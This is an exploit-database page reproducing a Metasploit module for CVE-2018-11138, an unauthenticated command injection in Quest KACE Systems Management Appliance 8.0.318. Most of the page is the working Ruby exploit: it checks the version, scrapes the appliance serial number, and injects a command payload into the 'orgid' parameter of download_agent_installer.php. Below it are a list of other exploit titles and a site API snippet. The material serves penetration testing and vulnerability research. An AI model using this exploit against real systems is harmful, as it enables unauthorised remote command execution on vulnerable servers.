Search for hundreds of thousands of exploits

"Quest KACE Systems Management - Command Injection (Metasploit)"

Author

Exploit author

Metasploit

Platform

Exploit platform

unix

Release date

Exploit published date

2018-06-27

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Quest KACE Systems Management Command Injection',
      'Description'    => %q{
        This module exploits a command injection vulnerability in Quest KACE
        Systems Management Appliance version 8.0.318 (and possibly prior).

        The `download_agent_installer.php` file allows unauthenticated users
        to execute arbitrary commands as the web server user `www`.

        A valid Organization ID is required. The default value is `1`.

        A valid Windows agent version number must also be provided. If file
        sharing is enabled, the agent versions are available within the
        `\\kace.local\client\agent_provisioning\windows_platform` Samba share.
        Additionally, various agent versions are listed on the KACE website.

        This module has been tested successfully on Quest KACE Systems
        Management Appliance K1000 version 8.0 (Build 8.0.318).
      },
      'License'        => MSF_LICENSE,
      'Privileged'     => false,
      'Platform'       => 'unix', # FreeBSD
      'Arch'           => ARCH_CMD,
      'DisclosureDate' => 'May 31 2018',
      'Author'         =>
        [
          'Leandro Barragan', # Discovery and PoC
          'Guido Leo',        # Discovery and PoC
          'Brendan Coles',    # Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2018-11138'],
          ['URL', 'https://support.quest.com/product-notification/noti-00000134'],
          ['URL', 'https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities']
        ],
      'Payload'        =>
        {
          'Space'       => 1024,
          'BadChars'    => "\x00\x27",
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl'
            }
        },
      'Targets'        => [['Automatic', {}]],
      'DefaultTarget'  => 0))
    register_options [
      OptString.new('SERIAL',        [false, 'Serial number', '']),
      OptString.new('ORGANIZATION',  [true, 'Organization ID', '1']),
      OptString.new('AGENT_VERSION', [true, 'Windows agent version', '8.0.152'])
    ]
  end

  def check
    res = send_request_cgi('uri' => normalize_uri('common', 'download_agent_installer.php'))
    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    unless res.code == 302 && res.headers.to_s.include?('X-KACE-Appliance')
      vprint_status 'Remote host is not a Quest KACE appliance'
      return CheckCode::Safe
    end

    unless res.headers['X-KACE-Version'] =~ /\A([0-9]+)\.([0-9]+)\.([0-9]+)\z/
      vprint_error 'Could not determine KACE appliance version'
      return CheckCode::Detected
    end

    version = Gem::Version.new res.headers['X-KACE-Version'].to_s
    vprint_status "Found KACE appliance version #{version}"

    # Patched versions : https://support.quest.com/product-notification/noti-00000134
    if version < Gem::Version.new('7.0') ||
       (version >= Gem::Version.new('7.0') && version < Gem::Version.new('7.0.121307')) ||
       (version >= Gem::Version.new('7.1') && version < Gem::Version.new('7.1.150')) ||
       (version >= Gem::Version.new('7.2') && version < Gem::Version.new('7.2.103')) ||
       (version >= Gem::Version.new('8.0') && version < Gem::Version.new('8.0.320')) ||
       (version >= Gem::Version.new('8.1') && version < Gem::Version.new('8.1.108'))
      return CheckCode::Appears
    end

    CheckCode::Safe
  end

  def serial_number
    return datastore['SERIAL'] unless datastore['SERIAL'].to_s.eql? ''

    res = send_request_cgi('uri' => normalize_uri('common', 'about.php'))
    return unless res

    res.body.scan(/Serial Number: ([A-F0-9]+)/).flatten.first
  end

  def exploit
    check_code = check
    unless [CheckCode::Appears, CheckCode::Detected].include? check_code
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    serial = serial_number
    if serial.to_s.eql? ''
      print_error 'Could not retrieve appliance serial number. Try specifying a SERIAL.'
      return
    end
    vprint_status "Using serial number: #{serial}"

    print_status "Sending payload (#{payload.encoded.length} bytes)"

    vars_get = Hash[{
      'platform' => 'windows',
      'serv'     => Digest::SHA256.hexdigest(serial),
      'orgid'    => "#{datastore['ORGANIZATION']}#; #{payload.encoded} ",
      'version'  => datastore['AGENT_VERSION']
    }.to_a.shuffle]

    res = send_request_cgi({
      'uri'      => normalize_uri('common', 'download_agent_installer.php'),
      'vars_get' => vars_get
    }, 10)

    unless res
      fail_with Failure::Unreachable, 'Connection failed'
    end

    unless res.headers.to_s.include?('KACE') || res.headers.to_s.include?('KBOX')
      fail_with Failure::UnexpectedReply, 'Unexpected reply'
    end

    case res.code
    when 200
      print_good 'Payload executed successfully'
    when 404
      fail_with Failure::BadConfig, 'The specified AGENT_VERSION is not valid for the specified ORGANIZATION'
    when 302
      if res.headers['location'].include? 'error.php'
        fail_with Failure::UnexpectedReply, 'Server encountered an error'
      end
      fail_with Failure::BadConfig, 'The specified SERIAL is incorrect'
    else
      print_error 'Unexpected reply'
    end

    register_dir_for_cleanup "/tmp/agentprov/#{datastore['ORGANIZATION']}#;/"
  end
end
Release DateTitleTypePlatformAuthor
2020-05-25"Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)"remotewindowsMetasploit
2020-05-25"Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)"remotehardwareMetasploit
2020-05-22"WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)"remotemultipleMetasploit
2020-05-19"Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)"remotephpMetasploit
2020-05-01"Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)"remotemultipleMetasploit
2020-04-28"Docker-Credential-Wincred.exe - Privilege Escalation (Metasploit)"localwindowsMetasploit
2020-04-20"Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)"remotelinuxMetasploit
2020-04-17"Nexus Repository Manager - Java EL Injection RCE (Metasploit)"remotelinuxMetasploit
2020-04-16"Liferay Portal - Java Unmarshalling via JSONWS RCE (Metasploit)"remotejavaMetasploit
2020-04-16"Pandora FMS - Ping Authenticated Remote Code Execution (Metasploit)"remotelinuxMetasploit
2020-04-16"ThinkPHP - Multiple PHP Injection RCEs (Metasploit)"remotelinuxMetasploit
2020-04-16"TP-Link Archer A7/C7 - Unauthenticated LAN Remote Code Execution (Metasploit)"remotelinux_mipsMetasploit
2020-04-16"DotNetNuke - Cookie Deserialization Remote Code Execution (Metasploit)"remotewindowsMetasploit
2020-04-16"Apache Solr - Remote Code Execution via Velocity Template (Metasploit)"remotemultipleMetasploit
2020-04-16"PlaySMS - index.php Unauthenticated Template Injection Code Execution (Metasploit)"remotephpMetasploit
2020-04-16"VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)"localmacosMetasploit
2020-03-31"IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)"remotemultipleMetasploit
2020-03-31"Redis - Replication Code Execution (Metasploit)"remotelinuxMetasploit
2020-03-31"DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)"remotehardwareMetasploit
2020-03-31"SharePoint Workflows - XOML Injection (Metasploit)"remotewindowsMetasploit
2020-03-17"ManageEngine Desktop Central - Java Deserialization (Metasploit)"remotemultipleMetasploit
2020-03-17"Rconfig 3.x - Chained Remote Code Execution (Metasploit)"remotelinuxMetasploit
2020-03-10"Nagios XI - Authenticated Remote Command Execution (Metasploit)"remotelinuxMetasploit
2020-03-10"PHPStudy - Backdoor Remote Code execution (Metasploit)"remotephpMetasploit
2020-03-09"Apache ActiveMQ 5.x-5.11.1 - Directory Traversal Shell Upload (Metasploit)"remotewindowsMetasploit
2020-03-09"PHP-FPM - Underflow Remote Code Execution (Metasploit)"remotephpMetasploit
2020-03-09"Google Chrome 72 and 73 - Array.map Out-of-Bounds Write (Metasploit)"remotemultipleMetasploit
2020-03-09"Google Chrome 67_ 68 and 69 - Object.create Type Confusion (Metasploit)"remotemultipleMetasploit
2020-03-09"Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)"remotemultipleMetasploit
2020-03-09"OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)"locallinuxMetasploit
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/44950/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.